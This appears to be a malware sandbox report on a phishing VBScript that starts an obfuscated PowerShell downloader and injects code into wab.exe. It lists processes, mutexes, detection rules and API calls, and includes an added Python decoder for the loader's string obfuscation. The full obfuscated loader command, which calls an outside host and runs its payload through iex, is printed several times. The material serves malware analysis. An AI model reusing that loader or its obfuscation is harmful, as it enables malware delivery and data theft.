                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
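The string obfuscation in the command line above, decoded. This is an added example and not part of the Joe Sandbox report; it is a Python port of the sample's `Charcuteries` helper rather than the sample's own PowerShell. The script never initializes `$kbspriserne`, so the `${host}.CurrentCulture` test (always true on a real host) bumps it from `$null` to 1; `Charcuteries` then walks its argument with `Substring($i, 1)` for `$i` = 7, 15, 23, ... while `$i -lt Length - 1`, i.e. it keeps the eighth character of every 8-byte block and drops the trailing padding block, and `Venerator` hands each result to `& $Verdant`, where `$Verdant` itself decodes to `iex`. The `cls;write '...'` prefix only prints decoy words. The string constants in the block are copied verbatim from the command line; the page's copy of `$Electant` is one character short at `Tilbage` (most likely a non-ASCII character lost when the report was rendered, which is an assumption), so its decode goes out of step after `&& `, while the `cmd.exe /c "echo %appdata%\Angiosperm.Afm && echo t"` process further down the report shows what the intact string produced. `guess_params` goes beyond this sample: it brute-forces the offset and stride for loader variants that change the constants, scoring candidates by known PowerShell tokens (the token list is this example's choice).

```python
"""Port of the `Charcuteries` string decoder from the PowerShell stage.

Added example, not from the report or the sample. Only the string constants
below are the sample's (copied verbatim from the command line); everything
else is this example's own code.
"""

VERDANT = 'PresanciM,rgarierobotizx e serc '                    # `$Verdant`
SWINBURNIAN = ('LandsdkU ,treamsPres.deeStudie rReparat-'        # `$Swinburnian`
               'Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ')
REDIRECT = 'Intercl>precont '                                   # `$Tubelike193nsuetude`
FIRST_VENERATOR_ARG = (                                         # first `Venerator (...)` call
    'Plukfis$,ernekag Skaftel istteloScri.enb'
    'Slvt ssa SonatilVivendi:StokavsPXiphop,r'
    'UnempiraTenpou,eskruedesPrintertYawnproe'
    'OverplarOve,natnUnderkle JohanbsTrsti.e='
    ' U,admi( Brandsc Pro enm Bi.anhdepisarc '
    'Fiske e/ Anpa.tcNecessa Special$ Bl.dskE'
    'BadebuklOverla.e Stempec ongrestIdylliua'
    'EnergiknAfhngectblaaste),ystifi ')
ELECTANT = (                                                    # `$Electant`, later run via `cmd /c`
    'Pu.sigeekrumbencPi tsdihtestudioS,efuld '
    'W ggleh% inumssa AdultepRelandspdollargd'
    'Aportlaa ,paanttCappucca Uty el%'
    r'Placoph\FiskemeAPr vatin M.crobgKriminai'
    'BulletmoKinlesssAppetispAsthmaseTvangstr'
    'RaastofmHyper.a.UsikkerAWin.berfWienervm'
    'Cho,ine Vanarte&Tilsla,&Pestram TilbageS'
    'nafuincJusterihRekur ioUnculti Ranso ftAusc.lt ')


def charcuteries(stamgster: str, kbspriserne: int = 1) -> str:
    """Exact port of the sample's function. In the sample $kbspriserne is
    $null++ == 1; the loop calls Substring($i, $kbspriserne) for $i = 7, 15, ...
    while $i -lt Length - $kbspriserne, so it keeps the eighth character of
    each block and never reaches the last (padding) block."""
    papillons = len(stamgster) - kbspriserne
    recovered = []
    tubelike = 7
    while tubelike < papillons:
        recovered.append(stamgster[tubelike:tubelike + kbspriserne])
        tubelike += 8
    return "".join(recovered)


def decode(padded: str, offset: int, stride: int) -> str:
    """Generalised form (no trailing-block rule) for variants of the loader
    that change the offset and stride."""
    return padded[offset::stride]


# Tokens this example looks for when the constants are unknown (own choice).
KNOWN_TOKENS = ("iex", "http", "User-Agent", "$global:", "cmd /c", "Invoke")


def guess_params(padded: str, tokens=KNOWN_TOKENS, max_stride: int = 16):
    """Brute-force (offset, stride): score every candidate decode by how many
    known tokens it contains; return the best pair, or None if none scores."""
    best_score, best = 0, None
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            score = sum(decode(padded, offset, stride).count(t) for t in tokens)
            if score > best_score:
                best_score, best = score, (offset, stride)
    return best


def decode_report_strings() -> dict:
    """Run the exact port over the literals transcribed from the report."""
    return {
        "Verdant": charcuteries(VERDANT),
        "Swinburnian": charcuteries(SWINBURNIAN),
        "Tubelike193nsuetude": charcuteries(REDIRECT),
        "Venerator#1": charcuteries(FIRST_VENERATOR_ARG),
        "Electant": charcuteries(ELECTANT),
    }


if __name__ == "__main__":
    for name, value in decode_report_strings().items():
        print(f"{name:20} {value!r}")
    print("guessed (offset, stride) for $Swinburnian:", guess_params(SWINBURNIAN))
```

The trailing-block rule is the one detail worth keeping when porting: a plain `padded[7::8]` returns `'User-Agent '` with its padding space, which is why the port keeps the `Length - 1` bound. Running the port over the remaining `Charcuteries '...'` literals in the command line (including `$Judaeophobia`, which starts with `http://`) recovers the rest of the stage without executing anything; where a literal comes back garbled after a certain point, check that copy for a dropped character before suspecting a different scheme.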
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F0BEA22_2_00007FF848F0BEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F0B0F62_2_00007FF848F0B0F6
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240D71948_2_240D7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_240CB5C18_2_240CB5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B04011_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043610D11_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044731011_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A49011_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040755A11_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C56011_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B61011_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044D6C011_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004476F011_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044B87011_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044081D11_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041495711_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004079EE11_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407AEB11_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AA8011_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412AA911_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B7411_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404B0311_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044BBD811_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404BE511_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00404C7611_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00415CFE11_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00416D7211_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D3011_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00446D8B11_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E8F11_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040503813_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041208C13_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050A913_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040511A13_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C13A13_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051AB13_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044930013_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040D32213_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A4F013_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043A5AB13_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041363113_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044669013_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A73013_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004398D813_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004498E013_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A88613_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043DA0913_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00438D5E13_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00449ED013_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041FE8313_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00430F5413_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050C214_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004014AB14_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040513314_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051A414_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040124614_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040CA4614_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040523514_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004032C814_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040168914_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00402F6014_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: PAYMENT - STATEMENT ADVISE.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_1084.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@20/13@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,11_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,14_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,11_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification,11_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,11_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Angiosperm.Afm
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqdjamr5.rdk.ps1
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3528
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1084
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: PAYMENT - STATEMENT ADVISE.vbsReversingLabs: Detection: 37%
                Source: PAYMENT - STATEMENT ADVISE.vbsVirustotal: Detection: 14%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33249
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT - STATEMENT ADVISE.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
